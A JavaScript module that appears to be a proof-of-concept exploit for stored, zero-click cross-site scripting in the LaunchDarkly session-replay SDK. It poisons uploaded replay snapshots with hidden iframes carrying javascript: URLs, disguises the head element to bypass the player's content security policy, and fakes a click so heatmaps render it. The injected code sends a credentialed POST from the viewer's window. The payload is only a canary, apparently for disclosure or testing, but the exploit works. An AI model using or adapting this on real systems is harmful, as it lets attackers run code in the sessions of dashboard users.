const CONSOLE_MESSAGE =
  "HELLLLLLLLLLLOOOOOO WORLLDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD!!!!!!!!";
const CANARY_PATH = "/WELPPPP_IAM_HERRRRRRREEEEEEEEEE";
const CASE_ID = "ld-zero-click-stored-array-iframe-js";
const RETRY_COUNT = 3;
const PARENT_ONCE_KEY = "__ldZeroClickStoredReplayPoC";

function walk(node, visit) {
  if (!node || typeof node !== "object") return;
  visit(node);
  for (const child of node.childNodes || []) walk(child, visit);
}

function waitFor(predicate, description, timeoutMs = 15_000) {
  const started = performance.now();
  return new Promise((resolve, reject) => {
    const check = () => {
      let value;
      try {
        value = predicate();
      } catch (error) {
        reject(error);
        return;
      }
      if (value) {
        resolve(value);
        return;
      }
      if (performance.now() - started >= timeoutMs) {
        reject(new Error(`Timed out waiting for ${description}`));
        return;
      }
      setTimeout(check, 20);
    };
    check();
  });
}

function makeCanaryQuery(sessionSecureID) {
  return new URLSearchParams({
    case: CASE_ID,
    session: sessionSecureID,
  });
}

function makeHandler(sessionSecureID) {
  const query = makeCanaryQuery(sessionSecureID);
  const onceKey = `${PARENT_ONCE_KEY}_${sessionSecureID}`;
  return [
    `if(!parent[${JSON.stringify(onceKey)}]){`,
    `parent[${JSON.stringify(onceKey)}]=true`,
    `top.console.log(${JSON.stringify(`${CONSOLE_MESSAGE} ${CASE_ID}`)})`,
    `top.fetch(${JSON.stringify(`${CANARY_PATH}?${query}`)},{method:"POST",credentials:"include",body:${JSON.stringify(CASE_ID)}}).catch(()=>{})`,
    `}`,
  ].join(";");
}

function makeJavascriptURL(handler, attempt) {
  // Distinct URLs force a new navigation even when a browser decides that
  // assigning the same iframe src repeatedly is a no-op.
  return `javascript:(()=>{${handler};void ${attempt};return void 0})()`;
}

function makeIframeRetry(frameId, javascriptURL, attempt) {
  return {
    type: 2,
    id: frameId,
    tagName: "iframe",
    attributes: {
      id: `ld-zero-click-poc-retry-${attempt}`,
      "data-poc-case": CASE_ID,
      src: [javascriptURL],
      style: "display:block;width:1px;height:1px;border:0;opacity:.001",
    },
    childNodes: [],
  };
}

function patchFullSnapshot(record, fullSnapshot, state) {
  if (!fullSnapshot?.data?.node) return false;

  let maxId = 0;
  let bodyNode = null;
  let decoyHead = null;
  let clickTarget = null;
  walk(fullSnapshot.data.node, (node) => {
    if (Number.isInteger(node.id)) maxId = Math.max(maxId, node.id);
    if (node.type !== 2) return;
    const tagName = String(node.tagName).toLowerCase();
    if (!bodyNode && tagName === "body") bodyNode = node;
    if (!decoyHead && tagName === "head") decoyHead = node;
    if (node.attributes?.["data-poc-click-target"] === "true") clickTarget = node;
  });
  if (!bodyNode || !decoyHead) {
    throw new Error("Full snapshot did not contain the required head and body nodes");
  }

  // The current player looks up `head` without checking its namespace before
  // appending its CSP meta. Preserve the tag name but rebuild it in SVG space,
  // where that meta is not an HTML document policy.
  if (decoyHead.attributes?.["data-poc-csp-decoy"] === "svg-head") return false;

  decoyHead.tagName = "head";
  decoyHead.isSVG = true;
  // Preserve every recorded child and ID. Later rrweb mutation records may
  // still reference them, and deleting them makes a chunk non-self-consistent.
  decoyHead.attributes = {
    ...decoyHead.attributes,
    "data-poc-csp-decoy": "svg-head",
  };

  const handler = makeHandler(record.sessionData.sessionSecureID);
  const firstRetryFrameId = maxId + 1001;
  bodyNode.childNodes.push(
    ...Array.from({ length: RETRY_COUNT }, (_, index) =>
      makeIframeRetry(
        firstRetryFrameId + index,
        makeJavascriptURL(handler, index + 1),
        index + 1,
      ),
    ),
  );

  // The real click dispatched after recording starts is normally present. This
  // fallback targets an actual element, rather than body, so the recording is
  // still heatmap-eligible if that event arrives after the bounded flush.
  const hasClick = record.events.some(
    (event) => event?.type === 3 && event.data?.source === 2 && event.data?.type === 2,
  );
  if (!hasClick && clickTarget) {
    record.events.push({
      type: 3,
      timestamp: Number(fullSnapshot.timestamp) + 750,
      data: { source: 2, type: 2, id: clickTarget.id, x: 1, y: 1 },
    });
  }

  state.patched = true;
  state.patchedSnapshots += 1;
  state.retryEvents += RETRY_COUNT;
  state.decoyHeadId = decoyHead.id;
  state.bodyId = bodyNode.id;
  state.clickTargetId = clickTarget?.id ?? null;
  state.canary = {
    consoleMessage: `${CONSOLE_MESSAGE} ${CASE_ID}`,
    method: "POST",
    path: `${CANARY_PATH}?case=${CASE_ID}&session=${encodeURIComponent(record.sessionData.sessionSecureID)}`,
  };
  return true;
}

function patchPendingFullSnapshots(record, state) {
  let patched = 0;
  for (const event of [...record.events]) {
    if (event?.type !== 2 || !event.data?.node) continue;
    if (!patchFullSnapshot(record, event, state)) continue;
    patched += 1;
  }
  // The heatmap seeks to the selected timestamp instead of advancing through
  // later mutation events. Keep every retry in the full snapshot, and only sort
  // here for the fallback click that may have been added above.
  record.events.sort((left, right) => Number(left.timestamp) - Number(right.timestamp));
  return patched;
}

function stopRecorderAtomically(record, state) {
  // The public LDRecord.stop() facade invokes stop(undefined). In the current
  // SDK, rrweb is detached only when the internal manual flag is true. Stop in
  // the upload wrapper, before _save() can schedule another chunk.
  if (record.pushPayloadTimerId) {
    clearTimeout(record.pushPayloadTimerId);
    record.pushPayloadTimerId = undefined;
  }
  record.stop(true);
  state.stopped = true;
}

export async function installReplayPoison(LDRecord, onState = () => {}) {
  const state = {
    sdkVersion: "@launchdarkly/session-replay@1.1.23",
    installed: false,
    patched: false,
    patchedSnapshots: 0,
    retryEvents: 0,
    sendCalls: 0,
    uploaded: false,
    finalized: false,
    stopped: false,
    session: null,
    canary: null,
    error: null,
  };
  const publish = () => onState({ ...state });

  const record = await waitFor(
    () => LDRecord?._sdk && typeof LDRecord._sdk._sendPayload === "function" && LDRecord._sdk,
    "the current session-replay recorder internals",
  );
  const originalSendPayload = record._sendPayload;
  let inFlightSend = null;
  let resolveUploaded;
  const uploaded = new Promise((resolve) => {
    resolveUploaded = resolve;
  });

  record._sendPayload = async function patchedSendPayload(...args) {
    // A click-triggered SDK flush and the explicit bounded flush can enter in
    // the same tick. Let every caller await one underlying request instead of
    // uploading an identical final payload twice.
    if (inFlightSend) return inFlightSend;
    state.sendCalls += 1;
    const receiver = this;
    const send = (async () => {
      try {
        patchPendingFullSnapshots(record, state);
        // This page intentionally produces one bounded payload. Mark that payload
        // as final so ingestion materializes the event chunk needed by the legacy
        // heatmap instead of retaining it as an active inline session.
        receiver.hasSessionUnloaded = true;
        state.finalized = true;
        const result = await originalSendPayload.apply(receiver, args);
        if (state.patched && !state.uploaded) {
          stopRecorderAtomically(receiver, state);
          state.uploaded = true;
          state.session = await Promise.resolve(LDRecord.getSession());
          publish();
          resolveUploaded({ state, record });
        }
        return result;
      } catch (error) {
        state.error = String(error?.stack || error);
        publish();
        throw error;
      }
    })();
    inFlightSend = send;
    try {
      return await send;
    } finally {
      if (inFlightSend === send) inFlightSend = null;
    }
  };

  state.installed = true;
  publish();
  return { state, record, uploaded, publish };
}

export async function waitForInitialSnapshot(record) {
  return waitFor(
    () => record.events.some((event) => event?.type === 2 && event.data?.node),
    "the recorder's initial full snapshot",
  );
}

export { CANARY_PATH, CASE_ID, CONSOLE_MESSAGE };
